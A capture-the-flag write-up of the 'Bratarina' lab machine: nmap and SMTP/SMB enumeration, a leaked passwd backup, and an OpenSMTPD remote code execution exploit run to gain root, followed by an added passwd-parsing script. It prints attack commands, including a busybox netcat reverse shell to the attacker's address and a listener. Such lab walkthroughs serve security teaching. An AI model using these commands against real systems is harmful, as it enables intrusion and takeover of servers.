# Bratarina

`OpenSMTPD` `SMTP`

* Machine name: Bratarina
* Difficulty: Easy
* OS: Linux

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 06:58 EDT
Nmap scan report for 192.168.194.71
Host is up (0.035s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT    STATE  SERVICE     VERSION
22/tcp  open   ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
|   256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
|_  256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
25/tcp  open   smtp        OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.195], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
80/tcp  open   http        nginx 1.14.0 (Ubuntu)
|_http-title:         Page not found - FlaskBB        
|_http-server-header: nginx/1.14.0 (Ubuntu)
445/tcp open   netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: bratarina
|   NetBIOS computer name: BRATARINA\x00
|   Domain name: \x00
|   FQDN: bratarina
|_  System time: 2024-07-23T07:00:47-04:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 1h19m51s, deviation: 2h18m35s, median: -9s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-07-23T11:00:49
|_  start_date: N/A
```

### HTTP (80): nginx 1.14.0

FlaskBB: nothing of interest.

### SMTP (25)

```
┌──(kali㉿kali)-[~]
└─$ nmap --script smtp-enum-users 192.168.194.71 -p 25
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 07:10 EDT
Nmap scan report for auth (192.168.194.71)
Host is up (0.034s latency).

PORT   STATE SERVICE
25/tcp open  smtp
| smtp-enum-users: 
|_  root
```

We have one user: root

We also found an exploit for OpenSMTPD:

<https://www.exploit-db.com/exploits/47984>

We will come back to it later.

### SMB (445)

```
┌──(kali㉿kali)-[~]
└─$ smbmap -H 192.168.194.71
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 192.168.194.71:445	Name: auth                	Status: Authenticated
	Disk                                                  Permissions	Comment
	----                                                  -----------	-------
	backups                                           	READ ONLY	Share for backups
	IPC$                                              	NO ACCESS	IPC Service (Samba 4.7.6-Ubuntu)
```

```
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.194.71/backups              
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jul  6 03:46:41 2020
  ..                                  D        0  Mon Jul  6 03:46:41 2020
  passwd.bak                          N     1747  Mon Jul  6 03:46:41 2020

		10253588 blocks of size 1024. 6353552 blocks available
smb: \> get passwd.bak
getting file \passwd.bak of size 1747 as passwd.bak (13.2 KiloBytes/sec) (average 13.2 KiloBytes/sec)
```

```
┌──(kali㉿kali)-[~]
└─$ cat passwd.bak 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
neil:x:1000:1000:neil,,,:/home/neil:/bin/bash
_smtpd:x:1001:1001:SMTP Daemon:/var/empty:/sbin/nologin
_smtpq:x:1002:1002:SMTPD Queue:/var/empty:/sbin/nologin
postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
```

Nothing exploitable by itself, but it gives us information about the machine.
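As an added example (not part of the original writeup), a small Python parser for a leaked passwd-format file that reports what a defender would triage first from such a backup: which accounts have an interactive shell, which have uid 0, and whether any password hashes are stored unshadowed. The sample input is constructed from a subset of the passwd.bak entries shown above.

```python
# Added example: parse /etc/passwd-style lines and summarise the accounts.
# SAMPLE_PASSWD is constructed from a subset of the passwd.bak above.

INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/bin/dash"}

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
neil:x:1000:1000:neil,,,:/home/neil:/bin/bash
_smtpd:x:1001:1001:SMTP Daemon:/var/empty:/sbin/nologin
postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
"""


def parse_passwd(text):
    """Return one dict per well-formed passwd line; reject malformed lines."""
    users = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell,
                      # "x" means the hash lives in /etc/shadow, not here
                      "shadowed": pw == "x"})
    return users


def interactive_accounts(users):
    """Accounts that can log in with a real shell (the ones worth auditing)."""
    return sorted(u["name"] for u in users if u["shell"] in INTERACTIVE_SHELLS)


def uid0_accounts(users):
    """Every account with uid 0 is root, whatever its name."""
    return sorted(u["name"] for u in users if u["uid"] == 0)


def unshadowed_accounts(users):
    """Accounts whose password hash (or empty password) sits in passwd itself."""
    return sorted(u["name"] for u in users if not u["shadowed"])


if __name__ == "__main__":
    users = parse_passwd(SAMPLE_PASSWD)
    print("interactive:", interactive_accounts(users))
    print("uid 0:", uid0_accounts(users))
    print("unshadowed:", unshadowed_accounts(users))
```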

## Initial access

### OpenSMTPD RCE

We return to the exploit found earlier: <https://www.exploit-db.com/exploits/47984>

```
┌──(kali㉿kali)-[~]
└─$ python exploit.py 192.168.194.71 25 "ping -c2 192.168.45.195"

┌──(kali㉿kali)-[~/exam/redis-rce]
└─$ sudo tcpdump -i tun0 icmp
[sudo] password for kali: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
08:13:21.217297 IP auth > 192.168.45.195: ICMP echo request, id 1934, seq 1, length 64
08:13:21.217342 IP 192.168.45.195 > auth: ICMP echo reply, id 1934, seq 1, length 64
08:13:22.219960 IP auth > 192.168.45.195: ICMP echo request, id 1934, seq 2, length 64
08:13:22.220003 IP 192.168.45.195 > auth: ICMP echo reply, id 1934, seq 2, length 64
```

It works!

We went through a good number of payloads from <https://www.revshells.com/>. We also tried creating a file containing a reverse shell, but did not manage to download it onto the target machine.

We obtained a reverse shell using busybox, with a netcat listener waiting on port 445 at the same time.

```
┌──(kali㉿kali)-[~]
└─$ python exploit.py 192.168.194.71 25 "busybox nc 192.168.45.195 445 -e /bin/sh"
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 445 
listening on [any] 445 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.194.71] 36776
whoami
root
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@bratarina:~# cat /root/proof.txt
cat /root/proof.txt
```

We are root!
